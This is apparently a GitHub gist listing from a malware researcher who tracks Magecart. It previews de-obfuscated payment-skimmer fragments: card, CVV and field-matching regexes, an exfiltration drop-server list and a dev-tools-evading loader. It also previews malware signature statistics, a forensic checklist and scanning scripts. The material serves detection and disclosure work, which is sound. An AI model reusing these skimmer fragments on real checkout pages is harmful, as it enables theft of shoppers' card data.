Willem de Groot gwillem
@gwillem
gwillem / infowarstores.com.js
Created Nov 13, 2018
de-obfuscated infowarsstore.com payment skimmer as detected on 2018-11-12 by https://twitter.com/gwillem
var idString = "id",
nameString = "name",
tokenOrCSRF = new RegExp("token|search|csfr|keyword|button"),
zoneRegionStateCountry = new RegExp("zone|region|state|country"),
formObj = {},
formLength = 0,
emptyString = "",
devToolsStatus = {
open: !1,
orientation: null
@gwillem
gwillem / techrabbit.com.js
Last active Oct 9, 2018
TechRabbit.com busted by Magecart again. Malware hosted at checkercarts.com / exfil server itenvoirtech.com
var protocol = window.location.protocol != 'https:' ? 'http://' : 'https://';
var hostname = window.location.host;
var fieldNameRegex = 'shipping|billing|payment|cc|month|card|year|expiration|exp|cvv|cid|code|ccv|authorize|firstname|lastname|street|city|phone|number|email|zip|postal|region|country';
var ccRegex = '[0-9]{13,16}|[0-9 -]{16,20}';
var fieldTypeRegex = 'select|password|checkbox|radio|text|hidden|number|tel|email';
var orderButtons = 'a[title*=\'Place Order\'],a[href*=\'javascript: ; \'],a[href*=\'javascript: void (0)\'],a[href*=\'javascript: void (0); \'],a[href=\'#\'],button,input,submit,.btn,.button';
var emptyString = '';
var saveOrderURL = window.location.href.substr(window.location.href.replace('://', '').indexOf('/') + 3) + '/' + 'saveOrder';
var emptyList = [];
var dropServers = ['itenvoirtech.com'];
@gwillem
gwillem / pageseal.js
Created Sep 16, 2018
Page Seal partially de-obfuscated
const jsdom = require("jsdom");
const { JSDOM } = jsdom;
const dom = new JSDOM(`<!DOCTYPE html><p>Hello world</p>`,
{ url: "https://example.org/" });
var window = dom.window
var document = window.document
var $ = require("jquery")(window);
var jQuery = $;
@gwillem
gwillem / stats.txt
Created Sep 6, 2018
top malware signature hits for 2018-09-06
4424 magentocore.net/
4023 \x6D\x61\x67\x65\x6E\x74\x6F\x63\x6F\x72\x65\x2E\x6E\x65\x74
4009 \x22\x63\x63\x5F\x65\x78\x70
772 \x63\x68\x65\x63\x6B\x6F\x75\x74
728 \x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C
699 \x6F\x6E\x65\x70\x61\x67\x65
685 CoinHive.
678 \x63\x68\x65\x63\x6B\x6F\x75\x74\x7C
669 \x6F\x6E\x65\x73\x74\x65\x70
648 \x6F\x6E\x65\x70\x61\x67\x65\x7C\x63\x68\x65\x63\x6B\x6F\x75\x74
View string_search_benchmarks.go
package main
import (
"fmt"
"io/ioutil"
"log"
"strings"
"testing"
"time"
@gwillem
gwillem / screenshot-upload.sh
Created Mar 13, 2018
One button screenshot uploader for Ubuntu
#!/bin/bash
# Requires xclip.
# Creates a screenshot, uploads it to your server over SSH and copies the URL to the clipboard.
SRC_PATH=$1
SRC_FILE=$(/usr/bin/basename "$SRC_PATH")
# Random 24-character alphanumeric name so the resulting URL is not guessable.
PREFIX=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | head -c 24)
DST_FILE="${PREFIX}.png"
@gwillem
gwillem / getting-started.md
Last active Sep 20, 2018
Forensic Analysis -- getting started checklist

Security breach post mortem / analysis

Thank you for your assignment and your trust. To optimize the output and to get started quickly, I would need the following:

  1. Who is involved with the case on your side? Add me (gwillem@gmail.com) to a chat/hangout/telegram group with your dev/ops team for technical discussion.
  2. Send me an overview of what you have found so far.
    • Who discovered the breach? When and how?
    • Established timeline
    • Suspected point of entry
    • Affected services
@gwillem
gwillem / censys-coinhive.py
Created Nov 10, 2017
censys coinhive query
#!/usr/bin/env python
import os
import censys.websites, censys.ipv4
UID = os.getenv('CENSYS_UID')
KEY = os.getenv('CENSYS_KEY')
NEEDLE = 'coinhive.min.js'
View m2-fingerprint-kata.md

M2 Fingerprint Kata

Objective: create an algorithm that identifies the version of a remote M2 install, by examining at most 5 URIs (limited as to not overload the remote server).

Background: I created a somewhat optimal set of fingerprints for Magento 1. However, for M2 there are fewer unique characteristics. I suspect that combining multiple fingerprints will yield better results. But how to establish the optimal set of fingerprint combinations?

Corpus

Use a list of 234 static files that have different checksums for different M2 versions.

@gwillem
gwillem / malware-that-detects-firebug-developer-tools.js
Created Apr 11, 2017
www.MageReport.com now checks for malware that disables itself when Firebug is detected
! function(n, e, i) {
function t(n, e, i) {
for (var t = e % n.length, r = ""; r.length < n.length; t = (t + i) % n.length) r += n.charAt(t);
return r
}
function r(n, e) {
var i, r, o, c = function(n) {
var e = document.getElementById(n);
return e ? e.value || "" : ""